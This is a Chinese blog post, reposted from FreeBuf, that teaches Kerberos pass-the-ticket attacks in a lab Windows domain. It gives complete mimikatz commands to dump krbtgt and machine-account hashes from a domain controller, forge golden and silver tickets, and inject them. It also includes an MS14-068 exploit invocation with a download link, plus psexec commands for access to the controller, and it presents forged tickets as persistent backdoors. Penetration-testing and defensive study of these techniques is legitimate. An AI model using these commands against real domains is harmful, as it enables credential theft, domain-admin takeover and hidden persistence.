域渗透之票据传递攻击

已于 2022-12-13 08:15:20 修改
阅读量434 收藏 1
点赞数 1
分类专栏: 域渗透 文章标签: 网络安全
于 2022-12-13 08:14:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/128295837
版权

目录

Kerberos 认证中的相关安全问题概述

黄金票据(Golden ticket)

Mimikatz 下的利用

白银票据(Silver ticket)

MS14-068

利用 MS14-068.exe

Kerberos 认证中的相关安全问题概述

Kerberos 认证并不是天衣无缝的,这其中也会有各种漏洞能够被我们利用,比如我们常说的 MS14-068、黄金票据、白银票据等就是基于Kerberos协议进行攻击的。下面我们便来大致介绍一下Kerberos 认证中的相关安全问题。

黄金票据(Golden ticket)

在 Windows 的 kerberos 认证过程中,Client 将自己的信息发送给 KDC,然后 KDC 使用 Krbtgt 用户的 NTLM 哈希作为密钥进行加密,生成 TGT。那么如果获取到了 Krbtgt 的 NTLM 哈希值,不就可以伪造任意的 TGT 了吗。因为 Krbtgt 只有域控制器上面才有,所以使用黄金凭据意味着你之前拿到过域控制器的权限,黄金凭据可以理解为一个后门。

利用 Krbtgt 的 Hash 值可以伪造生成任意的 TGT,能够绕过对任意用户的账号策略,让用户成为任意组的成员,可用于 Kerberos 认证的任何服务。

攻击者再使用黄金票据进行票据传递攻击时,通常要掌握以下信息:

需要伪造的域管理员用户名

完整的域名

域 SID

krbtgt 的 NTLM 哈希值

实验环境如下:

 假设有这么一种情况,原先攻击机已拿到的域内所有的账户 Hash,包括 Krbtgt 这个账户,由于有些原因导致你对域管权限丢失,但好在你还有一个普通域用户权限,碰巧管理员在域内加固时忘记重置 Krbtgt 密码,基于此条件,我们还能利用该票据重新获得域管理员权限。 

域成员主机:Windows 7

  • IP:192.168.93.20

  • 域名:whoamianony.org

  • 用户名:bunny

域控制器:Windows Server 2012

  • IP:192.168.93.30

  • 域名:whoamianony.org

  • 用户名:administrator

Mimikatz 下的利用

首先,我们登上域控,上传 mimikatz,然后执行如下命令抓取 krbtgt 用户的 Hash 值并获取域sid:

privilege::debug
lsadump::lsa /patch        // 专用于在域控制器上导出用户密码或 hash

得到 krbtgt 用户的 Hash 和 域 SID 分别为:

  • Hash 值:6be58bfcc0a164af2408d1d3bd313c2a

  • 域 SID:为 S-1-5-21-1315137663-3706837544-1429009142

 然后,我们切换到普通域用户的机器Windows 7,用 mimikatz 生成名为 ticket.kirbi 的 TGT 凭证,用户名为 administrator:

kerberos::golden /user:administrator /domain:whoamianony.org /sid:S-1-5-21-1315137663-3706837544-1429009142 /krbtgt:6be58bfcc0a164af2408d1d3bd313c2a /ticket:ticket.kirbi
​
# kerberos::golden /user:需要伪造的域管理员用户名 /domain:域名 /sid:域sid /krbtgt: krbtgt用户的Hash /ticket:ticket.kirbi

如上图所示,成功生成 TGT 凭证 ticket.kirbi,名为 ticket.kirbi,然后使用 mimikatz 将凭证ticket.kirbi 注入进去:

kerberos::ptt ticket.kirbi
#kerberos::ptt <票据文件>

 

 此时我们可以执行以下来查看当前会话中的票据,就可以发现刚刚注入的票据在里面了:

kerberos::tgt

 

 到此,注入成功。输入“exit”退出mimikatz,此时,攻击者就可以利用 Windows 7 任意访问域控了:

dir \\DC\c$

也可以使用 psexec,wmi 等方法对域控进行远程执行命令: 

psexec.exe \\DC cmd

 可见,黄金票据可以当做一个安装在普通域成员主机上的连接到域控的后门。

白银票据(Silver ticket)

白银票据不同于黄金票据,白银票据的利用过程是伪造 TGS,通过已知的授权服务密码生成一张可以访问该服务的 TGT。因为在票据生成过程中不需要使用 KDC,所以可以绕过域控制器,很少留下日志。而黄金票据在利用过程中由 KDC 颁发 TGT,并且在生成伪造的 TGT 得20分钟内,TGS 不会对该 TGT 的真伪进行效验。

白银票据依赖于服务账号的密码散列值,这不同于黄金票据利用需要使用 krbtgt 账号的密码哈希值,因此更加隐蔽。

攻击者要利用白银票据进行票据传递攻击时,需要掌握下面几个信息:

  • 域名

  • 域 SID

  • 目标服务器的 FQDN

  • 可利用的服务

  • 服务账号的 NTLM 哈希值

  • 要伪造的用户名 

实验环境如下:

域成员主机:Windows 7

  • IP:192.168.93.20

  • 域名:whoamianony.org

  • 用户名:bunny

域控制器:Windows Server 2012

  • IP:192.168.93.30

  • 域名:whoamianony.org

  • 用户名:administrator

 下面我们就使用白银票据来伪造 CIFS 服务权限,CIFS 服务通常用于Windows 主机之间的文件共享。

首先登录域控,抓取机器账号的哈希值:

privilege::debug
sekurlsa::logonpasswords

这里的 NTLM 和 SHA1 都可以用。得到计算机账号的哈希为:6decb5d75eb5727d8535e67680b52571

(注意是 DC$ 用户的 NTLM 哈希,不是 Administrator 用户,因为要利用共享服务账号)

然后切换到普通域用户机器 Windows 7 中,使用 mimikatz 生成伪造的白银票据:

kerberos::golden /domain:whoamianony.org /sid:S-1-5-21-1315137663-3706837544-1429009142 /target:DC.whoamianony.org /rc4:6decb5d75eb5727d8535e67680b52571 /service:cifs /user:administrastor /ptt
​
# kerberos::golden /domain:域名 /sid:域 SID /target:FQDN /rc4:server 机器的哈希 /service:可利用的服务 /user:要伪造的用户名 /ptt

 如上图所示,成功生成了伪造的白银票据,此时进行权限验证。如下,发现已经可以访问域控制器的共享目录了:

dir \\DC.whoamianony.org\c$         // 机器名要全称,注意是全称

 通常情况下,黄金票据和白银票据更适合做为一个安装在普通域成员主机上的连接到域控的后门。但在内网横向移动中也经常遇到他的身影,通过黄金票据和白银票据,我们可以通过当前那下的机器作为跳板使用 psexec、wmi 等方式对目标机执行命令,也可以将生成的木马复制到目标机器上,然后通过计划任务或服务等方式执行,最终是目标机上线。

MS14-068

这里就涉及到了我们之前所讲的PAC这个东西了,

我们在关于 Kerberos 认证流程的介绍中提到了 PAC(Privilege Attribute Certificate)这个东西,这是微软为了访问控制而引进的一个扩展,即特权访问证书。

在 Kerberos 认证流程中,如果没有 PAC 的访问控制作用的话,只要用户的身份验证正确,那么就可以拿到 TGT,有了 TGT,就可以拿到 ST,有了 ST ,就可以访问服务了。此时任何一个经过身份验证的用户都可以访问任何服务。像这样的认证只解决了 "Who am i?" 的问题,而没有解决 "What can I do?" 的问题。

为了解决上面的这个问题,微软引进了PAC。即 KDC 向客户端 Client 返回AS_REP时插入了 PAC,PAC 中包含的是用户的 SID、用户所在的组等一些信息。当最后服务端 Server 收到 Client 发来的AP_REQ请求后,首先会对客户端身份验证。通过客户端身份验证后,服务器 Server 会拿着 PAC 去询问 DC 该用户是否有访问权限,DC 拿到 PAC 后进行解密,然后通过 PAC 中的 SID 判断用户的用户组信息、用户权限等信息,然后将结果返回给服务端,服务端再将此域用户请求的服务资源的 ACL 进行对比,最后决定是否给用户提供相关的服务。

但也恰恰是是这个 PAC,造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC 。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。

攻击者要利用 MS14-068 这个漏洞提权时,需要掌握下面几个信息:

  • 域内任意用户SID

  • 域内任意用户密码

实验环境如下:

域成员主机:Windows 7

  • IP:192.168.93.20

  • 域名:whoamianony.org

  • 用户名:bunny

域控制器:Windows Server 2012

  • IP:192.168.93.30

  • 域名:whoamianony.org

  • 用户名:administrator

利用 MS14-068.exe

下载地址:WindowsExploits/MS14-068 at master · abatchy17/WindowsExploits · GitHub

首先,我们需要在目标主机 Windows 7 上面获得一个任意域用户的 SID:

whoami /all

 然后再 Windows 7 上传工具 ms14-068.exe,并执行如下命令生成 TGT 票据:

ms14-068.exe -u bunny@whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142-1112 -d 192.168.93.30 -p Bunny2021
​
# ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器ip地址 -p 域成员密码

如上图所示,成功生成了一个名为TGT_bunny@whoamianony.org.ccache的票据文件,接下来要做的就是将该票据文件注入到 Windows 7 的内存中了。

在 Windows 7 上传 mimikatz,利用 mimikatz 将票据注入到当前内存中,伪造凭证:

kerberos::purge         //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
kerberos::list          //查看当前机器凭证
kerberos::ptc TGT_bunny@whoamianony.org.ccache
#kerberos::ptc <票据文件>   //将票据注入到内存中

 

执行klist命令查看票据注入是否成功:

如上图,票据注入成功,此时,攻击者就可以利用 Windows 7 这个跳板机任意访问域中所有机器了,可以使用 net use 进行登录或者使用 psexec,wmi 等方法进行远程执行命令,后续的操作就和黄金票据一样了。 

dir \\DC\c$

 文章转载自内网渗透测试:Kerberos协议相关安全问题分析与利用 - FreeBuf网络安全行业门户

怰月
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
黄金票据——渗透
include_voidmain的博客
03-14 624
0x01前言 黄金票据是伪造票据授予票据(TGT),也被称为认证票据攻击者一旦拿到管权限的账号就可以伪造出黄金票据,逃过账号和密码的验证,即使修改管理员密码,攻击者依然能通过黄金票据进行访问。 0x02原理 kerberos认证中Client通过AS认证后,AS会给Client一个由Client的Master Key加密过的和TGT,Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到NTLM就能伪造TGT和Logon session key,
渗透PTT票据传递攻击(Pass the Ticket)
Longwaer
01-21 1753
通过笔记全方位讲解,加速学习了解PTT票据传递攻击的方法及原理,更好的去掌握黄金、白银票据生成。
内网渗透-(黄金票据和白银票据)详解(二)
最新发布
duoba_an的博客
04-01 1233
PAC (Privilege Attribute Certificate,特权属性证书),其中所包含的是各种授权信息、附加凭据信息、配置文件和策略信息等。例如用户所属的用户组, 用户所具有的权限等。在最初的RFC1510中规定的标准Kerberos认证过程中并没有PAC,微软在自己的产品中所实现的Kerberos流程加入了PAC的概念,因为在中不同权限的用户能够访问的资源是不同的,因此微软设计PAC用来辨别用户身份和权限。在一个正常的Kerberos认证流程中。
内网渗透(四) | 票据传递攻击
Ms08067安全实验室
06-29 2534
票据传递攻击(Pass the Ticket,PtT)票据传递攻击(PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。黄金票据攻击利用的前提是得到了内krbtg...
票据传递攻击
qq_56426046的博客
11-12 948
在 Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在KDC 中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造TGT和Logon Session Key 来进入下一步 Client 与 TGS 的交互。白银票据的利用过程是伪造TGS,通过已知的授权服务密码生成一张可以访问该服务的TGT。
渗透之银票据学习
cxk
06-10 1093
票据(silver ticket):它不需要和控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。 0x01 银票据利用条件 控计算机账户的ntlm hash 中的sid值 一台中主机 与其说是一种攻击方式,不如说是一种后门,当控权限掉后,再重新获取权限。 0x02 实战 环境 控2k3,ip:192.168.5...
渗透之黄金票据与白银票据
dys的博客
07-19 490
黄金票据和白银票据 kerberos协议
渗透中的DPAPI和Kerberos协议.pdf
08-08
议题分享主要介绍了渗透中数据保护API架构逻辑和Kerberos认证协议的通信流程,同时从攻击者的角度谈了DPAPI和Kerberos协议的利用,最后给出常见攻击思路的防御和缓解措施。 1.1 DPAPI架构 1.2 DPAPI加密机制 1.3 ...
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
恒生票据综合管理系统解决方案
03-14
恒生票据综合管理系统解决方案
票据培训20220120
01-20
票据培训20220120 票据培训是金融行业中的一门重要课程,旨在帮助学习者了解票据业务的基本概念、流程和操作。下面是票据培训的相关知识点: 1. 票据业务简介 票据业务是指银行或其他金融机构发放票据,以满足...
财务部物资入、出库票据传递程序.doc
02-14
财务部物资入、出库票据传递程序.doc
渗透攻击-Pass the Ticket 攻击(票据传递)
weixin_43227251的博客
04-13 860
Pass the Ticket 攻击(票据传递) 1.ms14-068 ​ 限制条件:打了补丁或者中有Win2012/2012R2 控 1.首先在控检测是否有MS14-068这个漏洞,通过查看是否打补丁(KB3011780)来判断是否存在漏洞,下图可以看到没有打MS14-068漏洞相关的补丁 systeminfo 测试访问控的C盘共享,访问被拒绝 3.为了使我们生成的票据起作用,首先我们需要将内存中已有的kerberos票据清除 ​ mimikatz kerberos::purge ​
渗透:黄金票据
ClarkAlbert的博客
10-29 1482
渗透:黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
渗透之(黄金票据利用)
cj_Hydra's Blog
02-13 2867
前言: 这里先介绍下Kerberos协议: Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。 在Kerberos协议中主要是有三个角色的存在: 1:访问服务的Client(用户的机器客户端) 2:提供服务的Server(服务端) 3:KDC(Key Distribution Center)密钥分发中心其中K...
[渗透测试笔记] 49.渗透黄金票据和白银票据
H4ppyD0g的博客
03-17 4572
Kerberos认证协议 《信息系统安全概论》书中对kerberos协议流程做了简化,如下所示 在此用下图做说明 KDC(密钥分发中心)包含身份认证服务器和服务审批服务器(用于票据授权服务TGS) DC是控制器;AD是活动目录。 DC中有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建时系统自动创建的,在整个kerberos认证中会多次用到它的Hash值去做验证。 AD会维护一个Account Database(账户数据库). 它存储了中所有用户的密码Hash和白名单。只有账户密码
内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)
m0_62783065的博客
09-22 497
PTT票据传递之黄金票据 (Golden Ticket),介绍黄金票据的原理及其使用方法
[内网渗透]—票据传递
Sentiment的博客
12-08 710
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
m0_62207170的博客
05-18 905
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
票据打印机如何打印票据
05-11
票据打印机可以通过以下步骤打印票据: 1. 连接票据打印机到计算机或POS系统。 2. 打开票据打印机驱动程序或软件。 3. 在票据打印机驱动程序或软件中设置打印参数,例如纸张大小、字体、边距、对齐方式等。 4. 编写票据内容,可以使用文本编辑器或POS系统生成票据内容。 5. 将票据内容发送到票据打印机。 6. 票据打印机将票据内容打印在预先设置好的纸张上。 7. 等待票据打印完成,取出打印好的票据。 不同型号的票据打印机可能具有不同的设置和操作步骤,具体操作请参考对应的用户手册或者驱动程序说明。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值